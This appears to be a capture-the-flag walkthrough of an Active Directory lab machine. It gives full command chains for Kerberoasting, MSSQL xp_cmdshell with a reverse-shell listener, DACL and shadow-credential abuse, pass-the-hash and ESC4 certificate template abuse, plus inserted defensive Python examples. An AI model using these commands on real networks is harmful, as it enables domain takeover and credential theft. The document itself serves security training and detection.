Enumeration

INFO

HTB provides us with valid credentials: rose / KxEPkKe6R8su

  • As in every penetration test, we start with an nmap scan:
nmap -p- -sS -n -Pn --min-rate 5000 -open 10.10.11.51 -oG allPorts
  • Now we know that the target machine is a Windows environment, so let's run a version scan and the default scripts against these ports:
sudo nmap -p 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49667,49689,49690,49691,49706,49722,49743,49810 -sCV --min-rate 5000 -n -Pn -open 10.10.11.51 -oN Targeted
  • The information to highlight:
    • we are facing a Domain Controller (DC01.sequel.htb)
    • the DC uses Kerberos for authentication
    • there is an LDAP service
    • there is an MS SQL service
    • it is an Active Directory domain

LDAP Enumeration

  • We can try to enumerate the LDAP directory using the given creds:
ldapsearch -x -H ldap://10.10.11.51 -D 'sequel\rose' -w 'KxEPkKe6R8su' -b "DC=sequel,DC=htb"
 
or (faster)
 
ldapdomaindump 10.10.11.51 -u 'sequel\rose' -p 'KxEPkKe6R8su' --authtype SIMPLE 

Kerberos

  • After looking through all the directories I didn't find anything, so let's perform a Kerberoasting attack with nxc:
netexec ldap 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' --kerberoast kerb.txt

  • After trying to crack them, none of the hashes crack:
john kerb.txt --wordlist=/usr/share/wordlists/rockyou.txt

BloodHound enumeration

bloodhound-python -d sequel.htb -u rose -p KxEPkKe6R8su -c ALL -ns 10.10.11.51
  • Then import it into BloodHound; we can see that there is only one user with admin rights.

There are 8 domain users.

  • The users sql_svc and ca_svc look interesting: sql_svc can access the SQL database, and with ca_svc we can issue certs, so let's use certipy-ad to enumerate the CA.

certipy-ad enumeration

  • We can tweak certipy to output the data in BloodHound format (and then import it):
certipy find -bloodhound -vulnerable -ns 10.10.11.51 -dc-ip 10.10.11.51 -u rose@sequel.htb -p 'KxEPkKe6R8su'
  • Let's read the result, but our own user doesn't have access.

SMB Enumeration

  • Let's continue the enumeration, now with SMB:
nxc smb 10.10.11.51 -u rose -p 'KxEPkKe6R8su' --shares
 
or
 
impacket-smbclient sequel/rose:KxEPkKe6R8su@10.10.11.51
  • We have read permission over "Accounting Department", so let's download the contents.
  • If we try to open the documents with LibreOffice, they appear corrupted.
  • But xlsx files are zip archives that contain the spreadsheet XML, so we can unzip them and read the shared strings directly:
unzip accounts.xlsx
libreoffice xl/sharedStrings.xml
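The same extraction can be scripted, which is also how a defender would sweep a share for spreadsheets that store credentials in clear text. The Python below is an added example, not part of this write-up: it parses xl/sharedStrings.xml and the sheet XML that references it by index, rebuilds the rows, and flags header columns that look like credential fields. The workbook is constructed in memory with placeholder values; only the file layout is real.

```python
"""Extract the cell text of an .xlsx without a spreadsheet application.

Added example, not part of the original write-up. An .xlsx is a zip archive:
xl/sharedStrings.xml holds the de-duplicated strings and each
xl/worksheets/sheetN.xml references them by index (cells with t="s").
CONSTRUCTED_ROWS are placeholders, not data from the target.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

CONSTRUCTED_ROWS = [
    ["First Name", "Last Name", "Email", "Username", "Password"],
    ["Alice", "Example", "alice@example.test", "alice", "PLACEHOLDER-1"],
    ["Bob", "Example", "bob@example.test", "bob", "PLACEHOLDER-2"],
]


def build_xlsx(rows):
    """Build a minimal .xlsx (bytes) whose cells are all shared strings."""
    strings, index, sheet_rows = [], {}, []
    for r, row in enumerate(rows, start=1):
        cells = []
        for c, value in enumerate(row):
            if value not in index:            # de-duplicate like Excel does
                index[value] = len(strings)
                strings.append(value)
            ref = f"{chr(ord('A') + c)}{r}"
            cells.append(f'<c r="{ref}" t="s"><v>{index[value]}</v></c>')
        sheet_rows.append(f'<row r="{r}">{"".join(cells)}</row>')
    sst = ('<sst xmlns="%s" count="%d" uniqueCount="%d">' % (NS["m"], len(strings), len(strings))
           + "".join(f"<si><t>{escape(s)}</t></si>" for s in strings) + "</sst>")
    sheet = ('<worksheet xmlns="%s"><sheetData>' % NS["m"]
             + "".join(sheet_rows) + "</sheetData></worksheet>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/sharedStrings.xml", sst)
        z.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


def read_shared_strings(z):
    """Return the shared-string table in index order (rich-text runs joined)."""
    root = ET.fromstring(z.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(f"{{{NS['m']}}}t"))
            for si in root.findall("m:si", NS)]


def col_index(ref):
    """Cell reference to zero-based column: 'A1' -> 0, 'B7' -> 1, 'AA1' -> 26."""
    n = 0
    for ch in re.match(r"[A-Z]+", ref).group(0):
        n = n * 26 + (ord(ch) - ord("A") + 1)
    return n - 1


def read_rows(xlsx_bytes, sheet="xl/worksheets/sheet1.xml"):
    """Return the sheet as a list of rows (lists of cell text), resolving shared strings."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        shared = read_shared_strings(z)
        root = ET.fromstring(z.read(sheet))
        rows = []
        for row in root.iterfind(".//m:row", NS):
            cells = {}
            for c in row.findall("m:c", NS):
                v = c.find("m:v", NS)
                if v is None:                  # empty cell
                    continue
                text = shared[int(v.text)] if c.get("t") == "s" else v.text
                cells[col_index(c.get("r"))] = text
            width = max(cells) + 1 if cells else 0
            rows.append([cells.get(i, "") for i in range(width)])
        return rows


def credential_columns(rows):
    """Header names suggesting stored credentials (a data-hygiene check for shares)."""
    if not rows:
        return []
    return [h for h in rows[0] if re.search(r"pass(word)?|secret|token", h, re.I)]


if __name__ == "__main__":
    rows = read_rows(build_xlsx(CONSTRUCTED_ROWS))
    for row in rows:
        print(" | ".join(row))
    print("credential-like columns:", credential_columns(rows))
```

Reading only sharedStrings.xml, as the write-up does, shows the unique strings in first-use order, so repeated values (the duplicated surname above) collapse into one entry; resolving the sheet's indices gives the rows back exactly.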

First Name   Last Name   Email               Username   Password
Angela       Martin      angela@sequel.htb   angela     0fwz7Q4mSpurIt99
Oscar        Martinez    oscar@sequel.htb    oscar      86LxLBMgEWaKUnBG
Kevin        Malone      kevin@sequel.htb    kevin      Md9Wlq1E5bZnVDVo
NULL         NULL        sa@sequel.htb       sa         MSSQLP@ssw0rd!

We can use these passwords in john to crack the tickets, but they didn't work.

Foothold

Enumerating as sa

  • The most important user here is sa, because it is the admin user of MSSQL, so let's try to log in as sa first (if we don't find anything we can try the other users):
mssqlclient.py sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51
  • Now we have to enable xp_cmdshell:
enable_xp_cmdshell
RECONFIGURE

  • Start a listener and then send the payload:
rlwrap -cAr nc -nlvp 4444

  • Now we have access to the system; let's enumerate some interesting resources.
  • We have another password, WqSZAF6CysDQbGb3; let's test it against the users we don't have a password for yet:
nxc smb 10.10.11.51 -u ./users -p ./passwords -k --continue-on-success | grep -e "[+]"

Lateral Movement

evil-winrm --ip 10.10.11.51 --user ryan --password WqSZAF6CysDQbGb3
  • Get the user flag.

Privilege Escalation

  • If we check BloodHound we can see that ryan has WriteOwner (as first degree object control) over the CA_SVC user.

If we have WriteOwner over a:

  • User:

    • We can assign all rights to another account, which allows us to perform a Password Reset via a Force Change Password attack, a Targeted Kerberoasting attack or a Shadow Credentials attack.
      • I would like to perform a Targeted Kerberoasting attack or a Shadow Credentials attack, mainly because I do not like changing users' passwords if I don't have to.
  • Group:

    • We can add or remove members after we grant the new owner (which we control) full privileges.
  • GPO:

    • We can modify it.
    • GPO attacks as well as other DACL abuses (such as computer attacks).
  • That means we have control over a privileged user.

  • First we have to get the ca_svc hash with a targeted Kerberoasting attack using targetedKerberoast.py:

python3 targetedKerberoast.py -v -d sequel.htb -u rose -p KxEPkKe6R8su --request-user ca_svc -o ca_svc.kerb

But we can't crack it.

So let's take ownership of ca_svc with owneredit.py:
owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' sequel.htb/ryan:WqSZAF6CysDQbGb3

You may have to try it a few times, because the first time I ran the script the user was not correct.

  • Now we can grant ryan full privileges over ca_svc using dacledit.py:
dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' sequel.htb/ryan:WqSZAF6CysDQbGb3

  • With full control we can add shadow credentials to ca_svc using pywhisker.py:
python3 pywhisker.py -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 --target "CA_SVC" --action "add" --filename CACert --export PEM
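Each step of this chain (owneredit, dacledit, pywhisker) writes an attribute on the ca_svc object that the domain controller logs as Security Event 5136 when object auditing is enabled: nTSecurityDescriptor for the owner and DACL changes, msDS-KeyCredentialLink for the shadow credential. The Python below is an added, defender-side example, not part of this write-up, that correlates such changes per actor and target; the 5136 records are constructed and the Tier-0 list is an assumption for the sample domain.

```python
"""Correlate directory object changes typical of WriteOwner -> DACL -> shadow
credential abuse.

Added example, not part of the original write-up. SAMPLE_5136 are constructed
records in the shape of Security Event 5136 (directory service object
modified); subjects, objects and timestamps are placeholders.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Attributes whose modification on a user object deserves attention, and why.
WATCHED_ATTRIBUTES = {
    "nTSecurityDescriptor": "owner/DACL rewritten (owneredit/dacledit style)",
    "msDS-KeyCredentialLink": "shadow credential added (pywhisker style)",
    "servicePrincipalName": "SPN added (targeted Kerberoasting setup)",
}

# Accounts whose ACL should only change through a controlled process (assumed list).
TIER0_OBJECTS = {"CN=ca_svc,CN=Users,DC=sequel,DC=htb"}

SAMPLE_5136 = [
    {"time": "2025-02-20T13:57:00", "subject": "SEQUEL\\ryan",
     "object": "CN=ca_svc,CN=Users,DC=sequel,DC=htb",
     "attribute": "nTSecurityDescriptor", "op": "Value Added"},
    {"time": "2025-02-20T13:58:30", "subject": "SEQUEL\\ryan",
     "object": "CN=ca_svc,CN=Users,DC=sequel,DC=htb",
     "attribute": "nTSecurityDescriptor", "op": "Value Added"},
    {"time": "2025-02-20T14:04:56", "subject": "SEQUEL\\ryan",
     "object": "CN=ca_svc,CN=Users,DC=sequel,DC=htb",
     "attribute": "msDS-KeyCredentialLink", "op": "Value Added"},
    {"time": "2025-02-20T15:00:00", "subject": "SEQUEL\\Administrator",
     "object": "CN=oscar,CN=Users,DC=sequel,DC=htb",
     "attribute": "description", "op": "Value Added"},
]


def find_acl_abuse_chains(events, window=timedelta(minutes=30)):
    """Group watched-attribute changes by (subject, object) and rate them.

    Severity is "high" when two or more watched attributes of a Tier-0 object
    were touched by the same actor within `window` of the first change (the
    full ownership -> DACL -> credential chain), "medium" for a single watched
    attribute on a Tier-0 object, and "low" elsewhere. Unwatched attributes
    (e.g. description) are ignored."""
    grouped = defaultdict(list)
    for ev in events:
        if ev["attribute"] in WATCHED_ATTRIBUTES:
            grouped[(ev["subject"], ev["object"])].append(
                (datetime.fromisoformat(ev["time"]), ev["attribute"]))

    findings = []
    for (subject, obj), changes in grouped.items():
        changes.sort()
        first = changes[0][0]
        attrs = sorted({a for t, a in changes if t - first <= window})
        if obj in TIER0_OBJECTS and len(attrs) >= 2:
            severity = "high"
        elif obj in TIER0_OBJECTS:
            severity = "medium"
        else:
            severity = "low"
        findings.append({
            "subject": subject,
            "object": obj,
            "attributes": attrs,
            "severity": severity,
            "why": [WATCHED_ATTRIBUTES[a] for a in attrs],
        })
    return findings


if __name__ == "__main__":
    for f in find_acl_abuse_chains(SAMPLE_5136):
        print(f"[{f['severity']}] {f['subject']} -> {f['object']}: " + "; ".join(f["why"]))
```

Without a SACL on the object no 5136 is produced at all, so the audit entry on service accounts (and the "Audit Directory Service Changes" subcategory) is what makes this chain visible.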

  • We now have full control over ca_svc, so let's request a TGT for this user using gettgtpkinit.py:
python3 ../../PKINITtools/gettgtpkinit.py -cert-pem CACert_cert.pem -key-pem CACert_priv.pem sequel.htb/ca_svc ca_svc.ccache

Save the AS-REP encryption key printed by the script for the next step: 2c9b71a0695508a8e51[snip]6eb5db62ddbc86b1a

  • Now we can use this .ccache file to get the NTLM hash of the user:
python3 ../../PKINITtools/getnthash.py -key 2c9b71a0695508a8e51[snip]62ddbc86b1a sequel.htb/ca_svc

  • With the NT hash we can pass-the-hash as the user ca_svc:
nxc smb 10.10.11.51 -u 'ca_svc' -H '3b181b91[snip]bc2b7fce' -k --continue-on-success | grep -e "[+]"

  • Nice! The NT hash works perfectly; we can run certipy again with these credentials:
certipy find -stdout -vulnerable -ns 10.10.11.51 -dc-ip 10.10.11.51 -u ca_svc@sequel.htb -hashes :'3b181b914e7[snip]c2b7fce'

  • This template is vulnerable to the ESC4 attack vector (since ca_svc is a member of the Cert Publishers group we can attack it).

  • Let's perform the attack:

certipy template -username ca_svc@sequel.htb -hashes :'3b181b914e7a9d5508ea1e20bc2b7fce' -template DunderMifflinAuthentication -save-old
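What the template rewrite above does, in attribute terms, is turn a template that is safe to leave enrollable into one with the ESC1 shape: the requester chooses the subject, no approval or signature gates the request, the EKU allows domain authentication, and a broad group can enroll. The Python below is an added example, not part of this write-up or of certipy: it audits a template's LDAP attributes for exactly those conditions and diffs a saved snapshot (the kind `-save-old` keeps) against the live one. Both template dictionaries are constructed; they are not the real DunderMifflinAuthentication template. The flag constants are the documented msPKI-* bit values.

```python
"""Audit certificate template settings for the ESC1 shape that write access
(ESC4) lets an attacker create.

Added example, not part of the original write-up. HARDENED_TEMPLATE and
WEAKENED_TEMPLATE are constructed; attribute names match the LDAP attributes
of objects under CN=Certificate Templates, "enrollment_principals" is a
simplified view of the template DACL.
"""

# msPKI-Certificate-Name-Flag bits
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # requester chooses subject/SAN
CT_FLAG_SUBJECT_ALT_REQUIRE_UPN = 0x02000000     # CA builds the SAN from the requester's UPN
# msPKI-Enrollment-Flag bits
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # manager approval required

# EKU OIDs that make a certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "2.5.29.37.0": "Any Purpose",
}

# Broad principals that should not be able to enroll in such a template.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

HARDENED_TEMPLATE = {
    "cn": "ConstructedTemplate",
    "msPKI-Certificate-Name-Flag": CT_FLAG_SUBJECT_ALT_REQUIRE_UPN,
    "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollment_principals": {"Domain Users"},
}

# The same template after its name flag and enrollment flag were rewritten.
WEAKENED_TEMPLATE = {
    **HARDENED_TEMPLATE,
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
}


def assess_template(t):
    """Return {'esc1': bool, 'findings': [...]} for one template.

    All five conditions must hold for the ESC1 verdict: enrollee-supplied
    subject, no manager approval, no authorized signature, an authentication
    EKU (or no EKU at all, which means any purpose), and a low-privileged
    principal with enrollment rights."""
    findings = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject (SAN can name any principal)")
    if not (t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS):
        findings.append("no manager approval")
    if t.get("msPKI-RA-Signature", 0) == 0:
        findings.append("no authorized signature required")
    ekus = t["pKIExtendedKeyUsage"]
    auth = [AUTH_EKUS[o] for o in ekus if o in AUTH_EKUS]
    if not ekus:
        auth = ["no EKU (any purpose)"]
    if auth:
        findings.append("authentication EKU: " + ", ".join(auth))
    low = sorted(t["enrollment_principals"] & LOW_PRIV_PRINCIPALS)
    if low:
        findings.append("enrollable by: " + ", ".join(low))
    return {"esc1": len(findings) == 5, "findings": findings}


def diff_templates(old, new):
    """Attribute names whose value differs between a saved snapshot and the
    current template; non-empty output on an unplanned change is the ESC4 signal."""
    return sorted(k for k in set(old) | set(new) if old.get(k) != new.get(k))


if __name__ == "__main__":
    for name, tpl in (("hardened", HARDENED_TEMPLATE), ("weakened", WEAKENED_TEMPLATE)):
        result = assess_template(tpl)
        print(f"{name}: ESC1={result['esc1']}")
        for line in result["findings"]:
            print("  -", line)
    print("changed:", diff_templates(HARDENED_TEMPLATE, WEAKENED_TEMPLATE))
```

The hardened baseline still reports three of the five conditions (no signature, auth EKU, Domain Users may enroll); that is a normal user-authentication template, and it only becomes exploitable once the subject flag and approval flag are flipped, which is precisely the two-attribute diff the snapshot comparison surfaces.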

certipy req -username ca_svc@sequel.htb -hashes :'3b181b914e7[snip]1e20bc2b7fce' -ca sequel-DC01-CA -target DC01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51

  • Now we have a certificate to authenticate as Administrator to the DC; we can use certipy to get the NTLM hash of this user:
certipy auth -pfx administrator.pfx -domain sequel.htb

  • Let's perform a pass-the-hash attack:
evil-winrm --ip 10.10.11.51 -u Administrator -H '7a8d4e[snip]60f75e5a0b3ff'

  • Now we are admin.

Root:MyLittlePony69!